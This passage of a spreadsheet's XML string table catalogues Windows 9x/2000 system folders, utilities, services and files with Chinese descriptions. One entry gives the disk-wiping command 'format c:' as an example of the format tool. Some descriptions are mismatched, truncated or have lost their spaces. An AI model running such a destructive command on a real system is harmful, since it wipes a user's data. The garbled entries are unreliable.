    <t>Windows的计划任务，添加的任务都会在这里面找得到。</t>
  </si>
  <si>
    <t>也是存放临文件的目录，不同的是它存放的是浏览网页时产生的临时文件。它可以加快网页的浏览速度，但太多很占空间的，要定期清理。</t>
  </si>
  <si>
    <t>这是存放一些与Web相关的东西。在资源管理器中按Web查看时浏览栏中的蓝天白云的图片，屏幕保护程序中的频道屏幕保护程序，以及IE浏览中找不到服务器时的Web页等都存放在这里。</t>
  </si>
  <si>
    <t>应用程序数据目录。</t>
  </si>
  <si>
    <t>Asd.exe</t>
  </si>
  <si>
    <t>Calc.exe</t>
  </si>
  <si>
    <t>计算器。</t>
  </si>
  <si>
    <t>Cdplayer.exe</t>
  </si>
  <si>
    <t>Windows自带的CD播放器。</t>
  </si>
  <si>
    <t>Charmap.exe</t>
  </si>
  <si>
    <t>Cleanmgr.exe</t>
  </si>
  <si>
    <t>磁盘清理程序。当你的磁盘空间不够时，用该程序可以帮助你快速地清除磁盘上的垃圾文件。</t>
  </si>
  <si>
    <t>Clipbrd.exe</t>
  </si>
  <si>
    <t>剪贴板查看程序。如果剪贴板上的内容过大过多，则会占用大量的内存。利用该程序可以查看和删除剪贴板中的内容。</t>
  </si>
  <si>
    <t>Clspack.exe</t>
  </si>
  <si>
    <t>Windows的打包软件。用此工具可以将文件进行压缩。</t>
  </si>
  <si>
    <t>Control.exe</t>
  </si>
  <si>
    <t>Cvtaplog.exe</t>
  </si>
  <si>
    <t>磁盘碎片整理助手。</t>
  </si>
  <si>
    <t>Defrag.exe</t>
  </si>
  <si>
    <t>碎片整理程序。运行该程序可以消除选定分区中的磁盘碎片。</t>
  </si>
  <si>
    <t>Drwatson.exe</t>
  </si>
  <si>
    <t>DVDPLAY.EXE</t>
  </si>
  <si>
    <t>DVD播放程序</t>
  </si>
  <si>
    <t>DXDIAG.EXE</t>
  </si>
  <si>
    <t>Emm386.exe</t>
  </si>
  <si>
    <t>扩展内存管理程序。</t>
  </si>
  <si>
    <t>Explorer.exe</t>
  </si>
  <si>
    <t>资源管理器。运行该程序将启动"资源管理器"。</t>
  </si>
  <si>
    <t>Extrac32.exe</t>
  </si>
  <si>
    <t>CAB文件包释放程序。用此文件，可以将CAB文件包中的文件释放出来。</t>
  </si>
  <si>
    <t>Fontview.exe</t>
  </si>
  <si>
    <t>字体查看程序。利用该程序，可以查看指定的Windows中安装的字体文件。命令行中跟上字体文件名（FON或TTF类型），可查看各种字体的样式范例。系统中所有字体文件的打开都是默认与它关联的。</t>
  </si>
  <si>
    <t>Freecell.exe</t>
  </si>
  <si>
    <t>空当接龙游戏。</t>
  </si>
  <si>
    <t>Ftp.exe</t>
  </si>
  <si>
    <t>文件传输程序。</t>
  </si>
  <si>
    <t>Grpconv.exe</t>
  </si>
  <si>
    <t>组文件转换工具。可把Win3X下的组文件（GRP扩展名），转换成Win98［开始］菜单中［程序］项下的文件夹，各个组项目也改头换面，成了文件夹中的快捷方式。</t>
  </si>
  <si>
    <t>Hh.exe</t>
  </si>
  <si>
    <t>帮助查看程序。</t>
  </si>
  <si>
    <t>Ieshwiz.exe</t>
  </si>
  <si>
    <t>自定义文件夹向导。Win98中你可对每个文件夹都设置其特有的外观式样，编辑文件夹的背景图案、文字颜色等内容，丰富自己系统的个性特征。它与资源管理器［查看］菜单中的［自定义文件夹...］项是对应的。</t>
  </si>
  <si>
    <t>IMEGEN.EXE</t>
  </si>
  <si>
    <t>具输入法生成器</t>
  </si>
  <si>
    <t>Internat.exe</t>
  </si>
  <si>
    <t>输入法切换程序。该程序常驻内存，运行后会在任务栏右下角出现熟悉的输入法字样。</t>
  </si>
  <si>
    <t>Ipconfig.exe</t>
  </si>
  <si>
    <t>DOS环境下的TCP/IP配置程序。可以在DOS环境下查看和修改TCP/IP的配置情况。</t>
  </si>
  <si>
    <t>IsUninst.exe</t>
  </si>
  <si>
    <t>卸载程序。执行该程序，可以安全卸载Windows中的程序和与其相关的组件。</t>
  </si>
  <si>
    <t>Kodakimg.exe</t>
  </si>
  <si>
    <t>Windows中的图像查看程序，运行该程序可以浏览多种格式的图形文件。</t>
  </si>
  <si>
    <t>Mem.exe</t>
  </si>
  <si>
    <t>DOS内存状况查看程序。运行此程序可以在MS－DOS窗口中查看当前运行的程序占用物理内存的情况。</t>
  </si>
  <si>
    <t>Mplayer.exe</t>
  </si>
  <si>
    <t>媒体播放机。运行该程序可以打开媒体播放器对话框，播放VCD或AVI等程序。</t>
  </si>
  <si>
    <t>Mkcompat.exe</t>
  </si>
  <si>
    <t>MSCONFIG.EXE</t>
  </si>
  <si>
    <t>Mshearts.exe</t>
  </si>
  <si>
    <t>网上红心大战游戏。</t>
  </si>
  <si>
    <t>msimn.exe</t>
  </si>
  <si>
    <t>Net.exe</t>
  </si>
  <si>
    <t>利用此工具可以查看本机的有关网络配置。</t>
  </si>
  <si>
    <t>NETCONN.EXE</t>
  </si>
  <si>
    <t>家庭网络向导</t>
  </si>
  <si>
    <t>Notepad.exe</t>
  </si>
  <si>
    <t>记事本。运行该程序进入"记事本"编辑窗口。</t>
  </si>
  <si>
    <t>Pbrush.exe</t>
  </si>
  <si>
    <t>画图程序。利用该程序可进入"画图"编辑窗口进行绘画操作。</t>
  </si>
  <si>
    <t>Progman.exe</t>
  </si>
  <si>
    <t>程序管理器。运行该程序可编辑已存在的程序组或创建新的程序组。</t>
  </si>
  <si>
    <t>Regedit.exe</t>
  </si>
  <si>
    <t>注册表编辑器。使用该程序可对Windows注册表进行查看和修改。</t>
  </si>
  <si>
    <t>Rsrcmtr.exe</t>
  </si>
  <si>
    <t>资源状况工具。利用此工具可以监视程序目前使用的系统资源。</t>
  </si>
  <si>
    <t>Scandskw.exe</t>
  </si>
  <si>
    <t>Scanregw.exe</t>
  </si>
  <si>
    <t>Setver.exe</t>
  </si>
  <si>
    <t>Smartdrv.exe</t>
  </si>
  <si>
    <t>虚拟缓存设置程序，可以把内存设置为虚拟缓存，从而提高数据的读写速度。</t>
  </si>
  <si>
    <t>Sndrec32.exe</t>
  </si>
  <si>
    <t>Sndvol32.exe</t>
  </si>
  <si>
    <t>Sol.exe</t>
  </si>
  <si>
    <t>纸牌游戏。</t>
  </si>
  <si>
    <t>Sysmon.exe</t>
  </si>
  <si>
    <t>系统监视器。运行该程序，可以监测系统当前的资源使用状况，如CPU的占用率、内存的使用情况等系统数据。</t>
  </si>
  <si>
    <t>SYSEDIT.EXE</t>
  </si>
  <si>
    <t>Systray.exe</t>
  </si>
  <si>
    <t>音频控制常驻内存程序。运行它就会出现大家熟悉的任务栏小喇叭图标，能用来调整音量和打开音频属性对话框。</t>
  </si>
  <si>
    <t>Taskman.exe</t>
  </si>
  <si>
    <t>任务工具，可用于查看当前正在运行的程序，也可运行需要执行的程序。</t>
  </si>
  <si>
    <t>Taskmon.exe</t>
  </si>
  <si>
    <t>任务监视器，它的功能是监视程序的执行情况并随时报告。能够监测所有在任务栏中以窗口方式运行的程序，可打开和结束程序，还可直接调出关闭系统对话框。</t>
  </si>
  <si>
    <t>Telnet.exe</t>
  </si>
  <si>
    <t>该程序主要用于连接远程计算机。</t>
  </si>
  <si>
    <t>TLOCMGR.EXE</t>
  </si>
  <si>
    <t>电话语音位置管理员。常驻内存程序，运行后有任务栏小图标，可方便的启动电话拨号程序和调整拨号属性。</t>
  </si>
  <si>
    <t>Tour98.exe</t>
  </si>
  <si>
    <t>Tuneup.exe</t>
  </si>
  <si>
    <t>wab.exe</t>
  </si>
  <si>
    <t>通讯簿管理程序。</t>
  </si>
  <si>
    <t>wabmig.exe</t>
  </si>
  <si>
    <t>通讯簿导入程序。</t>
  </si>
  <si>
    <t>Welcome.exe</t>
  </si>
  <si>
    <t>欢迎进入Windows的程序，能完成注册、连接Internet、维护计算机等功能，并可以设置为每次开机后显示。</t>
  </si>
  <si>
    <t>Winfile.exe</t>
  </si>
  <si>
    <t>文件管理器。运行该程序可以查找、查看文件和文件夹，显示文件信息，并对文件和文件夹的操作等。</t>
  </si>
  <si>
    <t>Winhelp.exe</t>
  </si>
  <si>
    <t>Windows的帮助信息。</t>
  </si>
  <si>
    <t>Wininit.exe</t>
  </si>
  <si>
    <t>Winipcfg.exe与Ipconfig.exe</t>
  </si>
  <si>
    <t>网络IP配置查询器的32位与16位版本。可检测本机当前的如IP地址、子网掩码等网络配置方面的详细信息。</t>
  </si>
  <si>
    <t>Winmine.exe</t>
  </si>
  <si>
    <t>扫雷游戏。</t>
  </si>
  <si>
    <t>Winver.exe</t>
  </si>
  <si>
    <t>Windows版本信息。</t>
  </si>
  <si>
    <t>Write.exe</t>
  </si>
  <si>
    <t>写字板。</t>
  </si>
  <si>
    <t>EUDCEDIT.EXE</t>
  </si>
  <si>
    <t>RSTRUI.EXE</t>
  </si>
  <si>
    <t>MSINFO32.EXE</t>
  </si>
  <si>
    <t>PINBALL.EXE</t>
  </si>
  <si>
    <t>桌上弹球游戏</t>
  </si>
  <si>
    <t>SPIDER.EXE</t>
  </si>
  <si>
    <t>蜘蛛纸牌</t>
  </si>
  <si>
    <t>HRTZZM.EXE</t>
  </si>
  <si>
    <t>RVSEZM.EXE</t>
  </si>
  <si>
    <t>SHVLZM.EXE</t>
  </si>
  <si>
    <t>BCKGZM.EXE</t>
  </si>
  <si>
    <t>CHKRZM.EXE</t>
  </si>
  <si>
    <t>faxsvc.exe</t>
  </si>
  <si>
    <t>帮助您发送和接收传真。(系统服务)</t>
  </si>
  <si>
    <t>cisvc.exe</t>
  </si>
  <si>
    <t>dmadmin.exe</t>
  </si>
  <si>
    <t>磁盘管理请求的系统管理服务。(系统服务)</t>
  </si>
  <si>
    <t>mnmsrvc.exe</t>
  </si>
  <si>
    <t>netdde.exe</t>
  </si>
  <si>
    <t>smlogsvc.exe</t>
  </si>
  <si>
    <t>配置性能日志和警报。(系统服务)</t>
  </si>
  <si>
    <t>rsvp.exe</t>
  </si>
  <si>
    <t>为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)</t>
  </si>
  <si>
    <t>RsEng.exe</t>
  </si>
  <si>
    <t>协调用来储存不常用数据的服务和管理工具。(系统服务)</t>
  </si>
  <si>
    <t>RsFsa.exe</t>
  </si>
  <si>
    <t>管理远程储存的文件的操作。(系统服务)</t>
  </si>
  <si>
    <t>grovel.exe</t>
  </si>
  <si>
    <t>snmp.exe</t>
  </si>
  <si>
    <t>包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)</t>
  </si>
  <si>
    <t>snmptrap.exe</t>
  </si>
  <si>
    <t>UtilMan.exe</t>
  </si>
  <si>
    <t>从一个窗口中启动和配置辅助工具。(系统服务)</t>
  </si>
  <si>
    <t>msiexec.exe</t>
  </si>
  <si>
    <t>All Users</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>除了"我的电脑"、"我的文档"这几个系统图标外其它由程序和文档建立的桌面快捷方式都会在这里面找到。如果在这里删除某个图标，相应的就会删除桌面上的图标。如果你在桌面上存放文件得话，实际也就是存放在这个文件夹。</t>
  </si>
  <si>
    <t>Downloaded Program Files</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>这是存放Windows的字体文件的目录。要安装某种字体只需将字体文件直接复制到该目录下即可。</t>
  </si>
  <si>
    <t>这里存放着Windows系统的声音文件，像Windows启动结束时发出的微软招牌音乐,MicrosoftSound等都存放于此。</t>
  </si>
  <si>
    <t>Offline Web Pages</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>这里存放着用于离线浏览的文件。</t>
  </si>
  <si>
    <t>Start Menu</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Start Menu\Programs</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>StartMenu\Programs\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Temp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主要用于存放执行解压缩、安装程序等操作时产生的临时文件的目录。要注意清理，避免临时文件长期占用硬盘空间</t>
  </si>
  <si>
    <t>Temporary Internet Files</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Application Data</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自动跳过驱动程序。利用该程序可以检查系统在启动过程中的错误并能提供相应的解决方案。在系统出现严重问题时，可检测引发故障的原因，并能选择是否跳过其认为是"罪魁祸首"的驱动程序。</t>
  </si>
  <si>
    <t>字符映射表。如果想在"记事本"中输入类似"①"的符号，利用字符映射表就可以方便解决。</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>调用［控制面板］程序。使用时不带参数可起动［控制面板］，若利用命令行在其后跟上某个控制项目文件名（.cpl类型，在System目录中能找到），将打开具体的控制项，如果再空一格并加上以逗号开头的数字代码，则可直接进入具体控制项的某一栏（控制项首栏数字代码是0)。例在［运行］命令行输入Controldesk.cpl,3后，将调出［显示］属性/设置］窗口。有了它，在编写自己的程序时，哪怕是最简单的批处理程序，都能轻松地打开［控制面板］完成系统设置的调整。这比起晦涩难懂的RunDll32.exe来，要容易得多。</t>
  </si>
  <si>
    <t>华生医生(Dr.Watson)，每当发生系统错误时能对系统拍取快照进行诊断，并可截获软件错误和提供详细的错误原因说明，还可就诊断的问题提出操作建议。这是Win98自带的系统诊断程序，设计该程序的初衷，主要是为了帮助微软技术人员，远程为你维护系统。运行它后，任务栏右下角出现了"医生"的图标（就是那个头带听诊器，装腔作势的"老外"），"狠击"它两下，立刻会跳出个忙碌的窗口，为你的"爱姬"检查身体。很快一张报告出来了，这便是当前时刻你的系统快照。其中包含有正在运行的任务、驱动程序、已加载的16位模块三类软件环境信息，实际上是［系统信息］（Msinfo32.exe）所提供资料的简化版。它的优势在于方便迅速，并能存为日志文件（.wlg扩展名），有利于前后对比查验系统存在的问题。</t>
  </si>
  <si>
    <t>DirectX诊断工具程序。</t>
  </si>
  <si>
    <t>强制兼容程序。微软设计Win9X时，考虑最多的问题恐怕就是兼容性了，以至于宁可牺牲部分32位程序性能，也要保证对传统软件最大限度的兼容。现在想想，这个程序之所以没有被放在明处，也许是微软非常自信系统的兼容性，觉得此东西用不着了吧！该工具的用法是当某个以前版本的Windows程序（主要是Win3X下的16位程序）无法运行或运行不稳定时，能提供众多可选项，用来调整其运行方式和运行环境，使之可正常使用，当然这是以放弃不少先进特性为代价的。</t>
  </si>
  <si>
    <t>系统启动配置程序。这是个非常有用的"好东东"，建议有基础的朋友为它在开始菜单中设个快捷方式。通过它，在Autoexec.bat、Config.sys、System.ini、Win.ini四个重要文件中，你可直接修改乃至创建新内容，而且对这些文件中的每一行，以及在注册表里注册为启动时运行的每一项，都能逐个选择是否禁止；该程序还为更高级用户准备了12个选项，可用于解决一些软、硬件兼容性问题。这个工具的另一大优点是，能方便地备份和还原启动配置，对被用户禁止的内容也不删除，只是加上特定标记暂且停用，以利于日后恢复，安全性很高。</t>
  </si>
  <si>
    <t>OutlookExpress程序。</t>
  </si>
  <si>
    <t>DOS工作方式的IP地址查寻工具。除能检测指定IP地址是否可连接外，还有一个用处是当登录服务器后，长时间无数据传输，为防止因超时而被对方断线，可不停地"Ping"它，达到强制连接某个主机的目的。此程序用法能在DOS窗口中查看到。</t>
  </si>
  <si>
    <t>磁盘扫描程序，可以发现并修复磁盘表面和磁盘上的数据错误。</t>
  </si>
  <si>
    <t>注册表检查与备份程序。执行该程序，可以检查注册表中的错误，如检查正确，将提示用户对注册表进行备份。是Windows\Command目录下Scanreg.exe的32位版本，可用于检查和备份注册表。修改Scanreg.ini文件中关键字Backup与Optimize的值，可决定是否备份与优化注册表（1为是；0为否）；修改MaxBackupCopies的值，可选择保留备份的个数，备份的CAB压缩包同时还保存System.ini和Win.ini两文件）；修改BackupDirectory的值，可指定备份压缩包存放的路径；用"Files=［目录代码，］文件名1，文件名2，..."的形式能添加需备份的文件，其中"目录代码"有10、11、30等，分别对应Windows目录、System目录及启动盘根目录。请最好加上"目录代码"，否则可能会因找不到目标，只有放几个空文件进压缩包。这个程序可用"/autorun"参数使其在后台最小化运行，可用"/backup"参数使其在后台自动备份。</t>
  </si>
  <si>
    <t>MS－DOS版本设置程序，用于查看程序的DOS版本号并能删除指定的DOS版本。</t>
  </si>
  <si>
    <t>录音机。在连接了音频设备的前提下，使用该程序可以进行录音操作，录下的文件(.wav)可以在录音机和媒体播放器中播放。</t>
  </si>
  <si>
    <t>音量调节程序。执行该程序，可以调节声音的大小和均衡。</t>
  </si>
  <si>
    <t>系统配置编辑程序。专门用来编辑Autoexec.bat、Config.sys、System.ini、Win.ini及Protocol.ini五个系统文件。</t>
  </si>
  <si>
    <t>漫游Windowsme程序。这是一个Windowsme的学习程序，初学者不妨用用。</t>
  </si>
  <si>
    <t>维护向导程序。维护向导调整你的计算机进入最佳状态，通过它可以设置定期执行"磁盘扫描程序"、"磁盘整理程序"和"磁盘清理程序"等来维护计算机。</t>
  </si>
  <si>
    <t>软件安装处理程序。它只能在实模式下运行，系统每次启动时都会运行它，用于检查Windows目录中是否有Wininit.ini文件(该文件是新装软件为了删除或替换一些在保护模式下无法修改的内存驻留程序，而建立的信息文件)。若有，则通过其中记录的内容，系统能自动完成软件的最后安装。Wininit.ini处理完后会被更名为Wininit.bak，用记事本打开，你可很容易了解到新装软件更动了哪些系统驻留文件（如DLL、EXE、DRV等）。</t>
  </si>
  <si>
    <t>Windows报告工具。主要用于向Microsoft公司报告Windows故障等情况。它能自动收集系统中一些相关信息，引导你写出规范的"情况汇报"，交给微软技术人员，使他们远程为你解决实际问题，当然这也是为完善和改进Windows系统收集资料。</t>
  </si>
  <si>
    <t>Internet红心后</t>
  </si>
  <si>
    <t>Internet翻转棋</t>
  </si>
  <si>
    <t>Internet黑桃王</t>
  </si>
  <si>
    <t>Internet双陆棋</t>
  </si>
  <si>
    <t>Internet跳棋</t>
  </si>
  <si>
    <t>用于格式化的文件。（例如formatc:，该命令有很多参数。）</t>
  </si>
  <si>
    <t>列出更多的参数。(例如dir|more，"|"在这里叫管道。)</t>
  </si>
  <si>
    <t>通emservice)</t>
  </si>
  <si>
    <t>管理RPC名称服务数据库。(系统服务)</t>
  </si>
  <si>
    <t>IndexingService(systemservice)</t>
  </si>
  <si>
    <t>允许有权限的用户使用NetMeeting远程访问Windows桌面。(系统服务)</t>
  </si>
  <si>
    <t>提供动态数据交换(DDE)的网络传输和安全特性。(系统服务)</t>
  </si>
  <si>
    <t>扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间。SCardSvr.exe对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)</t>
  </si>
  <si>
    <t>接收由本地或远程SNMP代理程序产生的陷阱消息，然后将消息传递到运行在这台计算机上SNMP管理程序。(系统服务)</t>
  </si>
  <si>
    <t>依据.MSI文件中包含的命令来安装、修复以及删除软件。(系统</t>
  </si>
  <si>
    <r>
      <t>Dialer.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t/>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电话拨号程序。运行该程序可打开"电话拨号程序"窗口。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Directcc.exe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>直接电缆连接程序。使用直接电缆连接，可以方便快捷地在两台计算机之间直接利用串口和并口连接。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Drvspace.exe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>磁盘空间管理程序。运行该程序可对磁盘进行压缩和解压缩操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>别忘了，在安装系统时系统提示过制作一张启动盘．这里都有些啥呢？平常用不着，在关键时可特管用。安装时没制作也不要紧，可按以下步骤制作a)在桌面上点击"开始"，选择"设置"，并打开"控制面板"；b)双击"添加/删除程序"；c)你会看到上方有3个标签，最右面的一个写着"启动盘"。点击这个标签，然后你会看到一个建立启动盘的按钮。你需要一张软盘储存在建立启动盘过程中的一切重要文件；d)把一张空白的软盘放进软驱，然后单击该按钮。现在已经完成了，你可以看到1.44MB的磁盘空间已经使用了1.15MB。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows系统内容</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>ACCESS.CHM</t>
  </si>
  <si>
    <t>Windows帮助文件</t>
  </si>
  <si>
    <t>ACCSTAT.EXE</t>
  </si>
  <si>
    <t>辅助状态指示器</t>
  </si>
  <si>
    <t>ADVAPI32.DLL</t>
  </si>
  <si>
    <t>高级Win32应用程序接口</t>
  </si>
  <si>
    <t>AHA154X.MPD</t>
  </si>
  <si>
    <t>SCSI驱动程序</t>
  </si>
  <si>
    <t>AM1500T.VXT</t>
  </si>
  <si>
    <t>网卡驱动程序</t>
  </si>
  <si>
    <t>AM2100.DOS</t>
  </si>
  <si>
    <t>APPSTART.ANI</t>
  </si>
  <si>
    <t>动画光标</t>
  </si>
  <si>
    <t>APPS.HLP</t>
  </si>
  <si>
    <t>AUDIOCDC.HLP</t>
  </si>
  <si>
    <t>“易码编码解码器”帮助文件</t>
  </si>
  <si>
    <t>AWARDPR32.EXE</t>
  </si>
  <si>
    <t>增加打印机工具</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>BIGMEM.DRV</t>
  </si>
  <si>
    <t>BIGMEM虚拟设备</t>
  </si>
  <si>
    <t>BILLADD.DLL</t>
  </si>
  <si>
    <t>动态链接库(支持MSW)</t>
  </si>
  <si>
    <t>BIOS.VXD</t>
  </si>
  <si>
    <t>即插即用BIOS接口</t>
  </si>
  <si>
    <t>BUSLOGIC.MPD</t>
  </si>
  <si>
    <t>CALC.EXE</t>
  </si>
  <si>
    <t>计算器应用程序</t>
  </si>
  <si>
    <t>CANNON800.DRV</t>
  </si>
  <si>
    <t>佳能打印机驱动程序</t>
  </si>
  <si>
    <t>CHOICE.COM</t>
  </si>
  <si>
    <t>MSDOS命令</t>
  </si>
  <si>
    <t>CHS16.FON</t>
  </si>
  <si>
    <t>字体文件(16点阵中文)</t>
  </si>
  <si>
    <t>CANYON.MID</t>
  </si>
  <si>
    <t>MIDI文件例子</t>
  </si>
  <si>
    <t>CARDDRV.EXE</t>
  </si>
  <si>
    <t>PCMCIA支持程序</t>
  </si>
  <si>
    <t>CDFS.VXD</t>
  </si>
  <si>
    <t>CDROM文件系统</t>
  </si>
  <si>
    <t>CDPLAYER.EXE</t>
  </si>
  <si>
    <t>CD播放器应用程序</t>
  </si>
  <si>
    <t>CDPLAYER.HLP</t>
  </si>
  <si>
    <t>CD播放器帮助文件</t>
  </si>
  <si>
    <t>CHIPS.DRV</t>
  </si>
  <si>
    <t>芯片技术显示驱动程序</t>
  </si>
  <si>
    <t>CHKDSK.EXE</t>
  </si>
  <si>
    <t>DOS磁盘检查工具</t>
  </si>
  <si>
    <t>CHOOSUSR.DLL</t>
  </si>
  <si>
    <t>网络客户</t>
  </si>
  <si>
    <t>CHOKD.WAV</t>
  </si>
  <si>
    <t>声音文件例子</t>
  </si>
  <si>
    <t>CIS.SCP</t>
  </si>
  <si>
    <t>脚本文件(演示如何建立与Compuserve的PPP连接)</t>
  </si>
  <si>
    <t>CLAIRE~1.RMI</t>
  </si>
  <si>
    <t>MINI序列</t>
  </si>
  <si>
    <t>CLIP.INF</t>
  </si>
  <si>
    <t>安装信息文件(剪粘板查看器)</t>
  </si>
  <si>
    <t>CLOSEWIN.AVI</t>
  </si>
  <si>
    <t>影片剪辑(AVI)(如何关闭窗口)</t>
  </si>
  <si>
    <t>CMC.DLL:Mail</t>
  </si>
  <si>
    <t>API1.0公共信息调用</t>
  </si>
  <si>
    <t>COMBUFF.VXD</t>
  </si>
  <si>
    <t>COM端虚拟设备</t>
  </si>
  <si>
    <t>COMCTL32.DLL</t>
  </si>
  <si>
    <t>32位Shell组件</t>
  </si>
  <si>
    <t>COMDLG32.DLL</t>
  </si>
  <si>
    <t>32位公共对话库</t>
  </si>
  <si>
    <t>COMIC.TIF</t>
  </si>
  <si>
    <t>公共对话库</t>
  </si>
  <si>
    <t>COMMDLG.DLL</t>
  </si>
  <si>
    <t>16位公共对话库</t>
  </si>
  <si>
    <t>COMMON.HLP</t>
  </si>
  <si>
    <t>OLE帮助文件</t>
  </si>
  <si>
    <t>COMPOBJ.DLL</t>
  </si>
  <si>
    <t>OLE16/32互*作库</t>
  </si>
  <si>
    <t>CONAGEN.EXE</t>
  </si>
  <si>
    <t>32位控制支持</t>
  </si>
  <si>
    <t>CONFAPI.DLL</t>
  </si>
  <si>
    <t>Microsoft网络组件</t>
  </si>
  <si>
    <t>配置文件</t>
  </si>
  <si>
    <t>CONFIG.TXT</t>
  </si>
  <si>
    <t>自述文件(配置文件中如何使用命令)</t>
  </si>
  <si>
    <t>CONTROL.EXE</t>
  </si>
  <si>
    <t>“控制面板”应用程序</t>
  </si>
  <si>
    <t>COOL.DLL</t>
  </si>
  <si>
    <t>统一资源定位文件</t>
  </si>
  <si>
    <t>COPY.INF</t>
  </si>
  <si>
    <t>安装信息文件</t>
  </si>
  <si>
    <t>CP-1250.NLS</t>
  </si>
  <si>
    <t>自然语言支持文件</t>
  </si>
  <si>
    <t>CPQNDIS.DOS</t>
  </si>
  <si>
    <t>CPQNDIS3.VXD</t>
  </si>
  <si>
    <t>Compaq以太控制器NDIS驱动程序</t>
  </si>
  <si>
    <t>CR3240.EXE</t>
  </si>
  <si>
    <t>DOS6.22中文版CR3240打印机驱动程序</t>
  </si>
  <si>
    <t>CRTDLL.DLL</t>
  </si>
  <si>
    <t>CSETUP.EXE</t>
  </si>
  <si>
    <t>MSDOS6.22中文设置程序</t>
  </si>
  <si>
    <t>CSETUP.WIN</t>
  </si>
  <si>
    <t>CSetup.exe支持文件</t>
  </si>
  <si>
    <t>CSMAPPER.SYS</t>
  </si>
  <si>
    <t>系统文件(支持PCMCIA)</t>
  </si>
  <si>
    <t>CSPMAN.DLL</t>
  </si>
  <si>
    <t>CTRLPAN.EXE</t>
  </si>
  <si>
    <t>MSDOS命令(系统控制台程序)</t>
  </si>
  <si>
    <t>MSDOS6.22中文版控制程序</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>DBLBVFF.SYS</t>
  </si>
  <si>
    <t>双缓冲驱动程序</t>
  </si>
  <si>
    <t>DC21X4.SYS</t>
  </si>
  <si>
    <t>NDIS3驱动程序</t>
  </si>
  <si>
    <t>DCIMAN.DLL</t>
  </si>
  <si>
    <t>显示控制接口</t>
  </si>
  <si>
    <t>DCIMAN32.DLL</t>
  </si>
  <si>
    <t>DDEML.DLL</t>
  </si>
  <si>
    <t>DDE信息库</t>
  </si>
  <si>
    <t>DEBMP.DLL</t>
  </si>
  <si>
    <t>光栅显示设备</t>
  </si>
  <si>
    <t>DEBUG.EXE</t>
  </si>
  <si>
    <t>Debug调试工具</t>
  </si>
  <si>
    <t>DECPSMW4.INF</t>
  </si>
  <si>
    <t>安装信息文件(DEC打印机安装)</t>
  </si>
  <si>
    <t>DECLAN.VXD</t>
  </si>
  <si>
    <t>DECLAN网卡驱动程序</t>
  </si>
  <si>
    <t>DEFRAG</t>
  </si>
  <si>
    <t>打开”选定驱动器”窗口</t>
  </si>
  <si>
    <t>DEL.INF</t>
  </si>
  <si>
    <t>DELTEMP.COM</t>
  </si>
  <si>
    <t>初始化帮助工具</t>
  </si>
  <si>
    <t>删除目录工具</t>
  </si>
  <si>
    <t>DEMET.DLL</t>
  </si>
  <si>
    <t>向量显示工程</t>
  </si>
  <si>
    <t>DESKCP16.DLL</t>
  </si>
  <si>
    <t>16位桌面控制面板</t>
  </si>
  <si>
    <t>DESKTOP.MSN</t>
  </si>
  <si>
    <t>DESS.DLL</t>
  </si>
  <si>
    <t>表格显示工程</t>
  </si>
  <si>
    <t>DEWP.DLL</t>
  </si>
  <si>
    <t>字处理显示工程</t>
  </si>
  <si>
    <t>DIALER.CNT</t>
  </si>
  <si>
    <t>对话帮助</t>
  </si>
  <si>
    <t>DIALER.EXE</t>
  </si>
  <si>
    <t>电话拨号程序</t>
  </si>
  <si>
    <t>DIALER.HLP</t>
  </si>
  <si>
    <t>电话拨号帮助文件</t>
  </si>
  <si>
    <t>DIALMON.EXE</t>
  </si>
  <si>
    <t>拨号监视程序(IE2.0)</t>
  </si>
  <si>
    <t>DIBENG.DLL</t>
  </si>
  <si>
    <t>独立设备的位同工程</t>
  </si>
  <si>
    <t>DICONIX.DRX</t>
  </si>
  <si>
    <t>打印机驱动</t>
  </si>
  <si>
    <t>非常棒哦^__^.WAN</t>
  </si>
  <si>
    <t>DIRECTCC.EXE</t>
  </si>
  <si>
    <t>直接线缆连接应用程序</t>
  </si>
  <si>
    <t>DISKCOMP</t>
  </si>
  <si>
    <t>磁盘比较工具</t>
  </si>
  <si>
    <t>DISKCOPY.COM</t>
  </si>
  <si>
    <t>磁盘拷贝工具</t>
  </si>
  <si>
